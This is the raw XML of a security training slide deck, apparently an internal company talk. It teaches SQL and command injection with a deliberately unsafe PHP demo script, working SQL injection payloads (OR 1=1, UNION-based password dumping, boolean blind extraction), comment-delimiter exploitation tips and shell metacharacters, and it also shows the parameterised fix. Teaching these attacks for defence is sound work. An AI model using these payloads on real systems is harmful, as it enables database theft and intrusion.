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sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="305" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="306" r:id="rId5"/>
    <p:sldId id="336" r:id="rId6"/>
    <p:sldId id="295" r:id="rId7"/>
    <p:sldId id="296" r:id="rId8"/>
    <p:sldId id="338" r:id="rId9"/>
    <p:sldId id="297" r:id="rId10"/>
    <p:sldId id="299" r:id="rId11"/>
    <p:sldId id="298" r:id="rId12"/>
    <p:sldId id="302" r:id="rId13"/>
    <p:sldId id="339" r:id="rId14"/>
    <p:sldId id="303" r:id="rId15"/>
    <p:sldId id="308" r:id="rId16"/>
    <p:sldId id="311" r:id="rId17"/>
    <p:sldId id="307" r:id="rId18"/>
    <p:sldId id="310" r:id="rId19"/>
    <p:sldId id="312" r:id="rId20"/>
    <p:sldId id="309" r:id="rId21"/>
    <p:sldId id="313" r:id="rId22"/>
    <p:sldId id="340" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="280" r:id="rId26"/>
    <p:sldId id="281" r:id="rId27"/>
    <p:sldId id="330" r:id="rId28"/>
    <p:sldId id="331" r:id="rId29"/>
    <p:sldId id="332" r:id="rId30"/>
    <p:sldId id="285" r:id="rId31"/>
    <p:sldId id="333" r:id="rId32"/>
    <p:sldId id="334" r:id="rId33"/>
    <p:sldId id="335" r:id="rId34"/>
    <p:sldId id="337" r:id="rId35"/>
    <p:sldId id="300" r:id="rId36"/>
    <p:sldId id="301" r:id="rId37"/>
    <p:sldId id="286" r:id="rId38"/>
    <p:sldId id="287" r:id="rId39"/>
    <p:sldId id="288" r:id="rId40"/>
    <p:sldId id="322" r:id="rId41"/>
    <p:sldId id="290" r:id="rId42"/>
    <p:sldId id="291" r:id="rId43"/>
    <p:sldId id="323" r:id="rId44"/>
    <p:sldId id="289" r:id="rId45"/>
    <p:sldId id="321" r:id="rId46"/>
    <p:sldId id="324" r:id="rId47"/>
    <p:sldId id="325" r:id="rId48"/>
    <p:sldId id="328" r:id="rId49"/>
    <p:sldId id="326" r:id="rId50"/>
    <p:sldId id="327" r:id="rId51"/>
    <p:sldId id="292" r:id="rId52"/>
    <p:sldId id="320" r:id="rId53"/>
    <p:sldId id="293" r:id="rId54"/>
    <p:sldId id="316" r:id="rId55"/>
    <p:sldId id="319" r:id="rId56"/>
    <p:sldId id="317" r:id="rId57"/>
    <p:sldId id="3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FAB15-031F-4838-BEA0-9B3AD977BA16}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="305"/>
            <p14:sldId id="258"/>
            <p14:sldId id="306"/>
            <p14:sldId id="336"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Burp Suite" id="{77353B27-85C4-40CD-A794-A4FD849DA7EA}">
          <p14:sldIdLst>
            <p14:sldId id="295"/>
            <p14:sldId id="296"/>
            <p14:sldId id="338"/>
            <p14:sldId id="297"/>
            <p14:sldId id="299"/>
            <p14:sldId id="298"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="SQL injection" id="{7BA1B82B-D328-484D-9550-0047A9BC7038}">
          <p14:sldIdLst>
            <p14:sldId id="302"/>
            <p14:sldId id="339"/>
            <p14:sldId id="303"/>
            <p14:sldId id="308"/>
            <p14:sldId id="311"/>
            <p14:sldId id="307"/>
            <p14:sldId id="310"/>
            <p14:sldId id="312"/>
            <p14:sldId id="309"/>
            <p14:sldId id="313"/>
            <p14:sldId id="340"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Command injection" id="{15229899-8E9E-4914-A3CD-6F7DBD5B263D}">
          <p14:sldIdLst>
            <p14:sldId id="278"/>
            <p14:sldId id="279"/>
            <p14:sldId id="280"/>
            <p14:sldId id="281"/>
            <p14:sldId id="330"/>
            <p14:sldId id="331"/>
            <p14:sldId id="332"/>
            <p14:sldId id="285"/>
            <p14:sldId id="333"/>
            <p14:sldId id="334"/>
            <p14:sldId id="335"/>
            <p14:sldId id="337"/>
            <p14:sldId id="300"/>
            <p14:sldId id="301"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Reverse shells" id="{5801FB98-F97D-417C-9FA1-B0A632417D0F}">
          <p14:sldIdLst>
            <p14:sldId id="286"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
            <p14:sldId id="322"/>
            <p14:sldId id="290"/>
            <p14:sldId id="291"/>
            <p14:sldId id="323"/>
            <p14:sldId id="289"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Abuse of sudo" id="{618CB265-AF7B-4934-A7DE-A869828D1DB1}">
          <p14:sldIdLst>
            <p14:sldId id="321"/>
            <p14:sldId id="324"/>
            <p14:sldId id="325"/>
            <p14:sldId id="328"/>
            <p14:sldId id="326"/>
            <p14:sldId id="327"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="&quot;Silence&quot; boot2root" id="{BE75F292-DCC5-4157-B69A-46AF7E0D6FF2}">
          <p14:sldIdLst>
            <p14:sldId id="292"/>
            <p14:sldId id="320"/>
            <p14:sldId id="293"/>
            <p14:sldId id="316"/>
            <p14:sldId id="319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>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-2672" y="-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1050-7969-425F-9270-DDF0D1FF927F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F181-E166-4642-B52B-F7F9EA3D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r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map.org/nca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sh.cudaops.com/projects/BNSEC/repos/traiing/brows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nsec_team@barracuda.com" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jkelly@barracuda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rp/cert" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/help/proxy_us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swigger.net/burp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Sounds of Silence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Justin Kelly, BNSEC</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>December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Burp Suite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Burp, by default, listens on 127.0.0.1:8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>You can open it up to 0.0.0.0:8080. Useful for inspecting mobile app traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Anyone who can proxy through it and can read your traffic log by default (at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>) including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>POST'ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> usernames/passwords!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Disable this feature at "Proxy &gt; Options &gt; Disable web interface at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>The SSL Interception feature doesn't check validity of upstream certs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>You can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>MitM'd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>MitM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> upstream from your Burp and you won't know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Yo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> dawg I heard you like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>MitM's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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Burp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Suite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SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Reverse shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Abuse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AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>"Silence" boot2root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quick foreword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Injection vulnerabilities consistently come in at number 1 in the OWASP Top Ten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Caused by the mixing of user-controlled data into a query language, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>markup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> language, or code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Many Injection vulnerabilities are fixed by parameterisation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>You wouldn't call a function using a space-separated string of arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Try to think of Database queries, LDAP queries, command executions etc. in the same way. A few extra lines (or characters) of code makes things cleaner, more reliable, and more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Occurs when an attacker gets control over non-data portions of a SQL Query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>You wanted your query to say "WHERE foo='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>They made your query say "WHERE foo='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bar' OR fizz='buzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Almost always results in an attacker being able to dump your database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Having your users' details dumped on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Pastebin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> makes for a Bad Day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>If they dump your application's admin passwords, could they log in via an admin portal, deface your application, steal non-database data, or penetrate the corporate network and steal other information?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>In some cases it can result in application authentication bypass or be chained to give Remote Code Execution on the webserver!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185295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the stage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./populate_db.bsh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gonna drop the table 'users'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you sure? [y/n] y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for user silence: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0 3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List of relations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Schema |     Name     |   Type   |  Owner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--------+--------------+----------+---------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| users        | table    | silence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| users_id_seq | sequence | silence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</a:p>
          <a:p>
            <a:endParaRPr lang="sv-SE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 |    password    |   cellnum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-------+----------------+--------------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sally | ***REDACTED ;) | 559-575-1337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craig | ***REDACTED ;) | 559-575-1338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yusuf | ***REDACTED ;) | 559-575-1339</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE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rows)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Anti-pattern: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Not parameterising queries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321356"/>
            <a:ext cx="10515600" cy="5291064"/>
            <a:chOff x="838200" y="1321356"/>
            <a:chExt cx="10515600" cy="5291064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690688"/>
              <a:ext cx="10515600" cy="4921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BC7A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&lt;?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="BC7A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php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require_once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db.php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argc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die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sprintf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"Usage: %s &lt;query&gt;"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0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]));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}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$query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"SELECT name, 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cellnum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FROM users WHERE name like </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BA2121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'%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0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b="1" dirty="0" err="1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b="1" dirty="0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[1]</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BA2121"/>
                  </a:solidFill>
                  <a:effectLst/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%'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"Executing: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BB668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$query\n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$result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pg_query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$query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or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die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'Query failed: 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.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pg_last_error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());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pg_num_rows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$result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$line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pg_fetch_array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$result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, PGSQL_ASSOC))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sprintf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"Name: %s, Cell: %s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BB662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$line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'name'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],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$line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cellnum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]));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 }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"No results found.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BB662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Courier New" panose="02070309020205020404" pitchFamily="49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 smtClean="0"/>
                <a:t>query_users_by_name_unsafe.php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Anti-pattern: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Not parameterising queries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"craig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 use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'%craig%'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craig, Cell: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559-575-1338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php query_users_by_name_unsafe.php "asdf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	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cause an error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'%asdf'%'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Warning:  pg_query(): Query failed: ERROR:  unterminated quoted string at or near "'"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1: SELECT name, cellnum FROM users WHERE name like '%asdf'%'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^ in /home/user/cuda/silence-presentation/sqli-demos/query_users_by_name_unsafe.php on line 13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failed: ERROR:  unterminated quoted string at or near "'"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1: SELECT name, cellnum FROM users WHERE name like '%asdf'%'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^</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE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"asdf' OR 1=1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dump the users table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'%asdf' OR 1=1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-%'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559-575-1337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craig, Cell: 559-575-1338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yusuf, Cell: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559-575-1339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asdf' UNION ALL SELECT name, password FROM users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dump the passwords! UNION-based injection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'%asdf' UNION ALL SELECT name, password FROM users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-%'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supersal99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craig, Cell: craig_is_crAzY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yusuf, Cell: c@tzCr@dl3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Anti-pattern: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Not parameterising queries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boolean-based character-by-character binary search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sv-SE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"sally' AND ascii(substring((SELECT password FROM users WHERE name = 'yusuf') from 1 for 1)) BETWEEN 33 and 122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char of yusuf's password is between &lt;space&gt; and ~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'%sally' AND ascii(substring((SELECT password FROM users WHERE name = 'yusuf') from 1 for 1)) BETWEEN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126;-- -%'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559-575-1337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"sally' AND ascii(substring((SELECT password FROM users WHERE name = 'yusuf') from 1 for 1)) BETWEEN 33 and 77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first char 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yusuf's password is </a:t>
            </a:r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between &lt;space&gt; and M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'%sally' AND ascii(substring((SELECT password FROM users WHERE name = 'yusuf') from 1 for 1)) BETWEEN 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77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-%'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results found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query_users_by_name_unsafe.php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"sally' AND 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(substring((SELECT password FROM users WHERE name = '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yusuf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from 1 for 1)) BETWEEN 78 and 122</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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en-AU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char of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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yusuf's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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 is between N and ~</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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cellnum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users WHERE name like '%sally' AND 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(substring((SELECT password FROM users WHERE name = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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yusuf</a:t>
            </a:r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from 1 for 1)) BETWEEN 78 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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126;-- -%'</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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559-575-1337</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE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query_users_by_name_unsafe.php "sally' AND substring((SELECT password FROM users WHERE name = 'yusuf') from 1 for 1) = 'c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';-- -"		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char of yusuf's password is 'c'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Executing: SELECT name, cellnum FROM users WHERE name like '%sally' AND substring((SELECT password FROM users WHERE name = 'yusuf') from 1 for 1) = 'c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';-- -%'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559-575-1337</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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we here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Put some faces to names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Learn some stuff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>vulnerabilities for better product security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Abuse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/>
              <a:t> - when everything's a nail you'll find a hammer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Drink all the booze, hack all the things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>"silence" and "crash" boot2root's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Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Parameterising queries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321356"/>
            <a:ext cx="10515600" cy="3919343"/>
            <a:chOff x="838200" y="1321356"/>
            <a:chExt cx="10515600" cy="3919343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690688"/>
              <a:ext cx="10515600" cy="3550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BC7A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&lt;?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="BC7A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php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[...]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$query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'SELECT name, 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cellnum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FROM users WHERE name like $1'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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1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params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array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"%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1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argv</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BB6688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[1]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%"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"Executing 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parameterised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query: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BB668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$query\n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"With parameters: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BB662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print_r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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1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params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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BB6622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\n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$result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pg_query_params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$query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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1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params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or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die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'Query failed: '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pg_last_error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());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[...]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 smtClean="0"/>
                <a:t>query_users_by_name_safe.php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19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Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0"/>
              <a:t>Parameterising queries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10469"/>
            <a:ext cx="10515600" cy="54476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php query_users_by_name_safe.php "sally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 use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parameterised query: SELECT name, cellnum FROM users WHERE name like $1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parameters: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[0] =&gt; %sally%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sally, Cell: 559-575-1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sv-SE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query_users_by_name_safe.php "asdf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	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trying to cause an erorr. No dice.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parameterised query: SELECT name, cellnum FROM users WHERE name like $1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parameters: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[0] =&gt; %asdf'%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results found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sv-SE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query_users_by_name_safe.php "sally' OR 1=1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-"	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE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trying to dump the users table. No dice.</a:t>
            </a:r>
            <a:endParaRPr lang="sv-S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parameterised query: SELECT name, cellnum FROM users WHERE name like $1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parameters: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[0] =&gt; %sally' OR 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE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;-- -%</a:t>
            </a:r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results found.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4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Exploitation pro-tip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MySQL is funny about what it considers to be a comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> delimiter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Problem: Sometimes it wants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>whitepace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> or EOL after the '--'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Solution: Add a training space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>';-- '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Problem: Sometimes developers trim() your input, killing your trailing space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Solution: Add any trailing non-space character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>';-- -'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>';-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>';-- whatever you want. it's a comment. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>wanna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> fight about it?'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83107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Burp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>SQL injection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Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Reverse shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Abuse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AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>"Silence" boot2root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7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Occurs when an attacker gets control over the first argument to a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AU" dirty="0" smtClean="0"/>
              <a:t>-type call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Involves the use of "shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>metacharacters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>" to inject and execute arbitrary commands (or perform other unintended behaviour)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo; bar		# run 'foo', then run 'bar'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo | bar		# run 'foo' then pipe the input to an invocation of 'bar'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo &amp; bar		# run 'foo' in the background then run 'bar'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo &amp;&amp; bar	# run 'foo' and if it succeeds (i.e. returns 0) run 'bar'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo || bar		# run 'foo' and if it fails (i.e. doesn't return 0) run 'bar'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo `bar`		# run 'foo' with the first argument being the output of having run 'bar'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo $(bar)		# run 'foo' with the first argument being the output of having run 'bar'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101603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Non-command injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
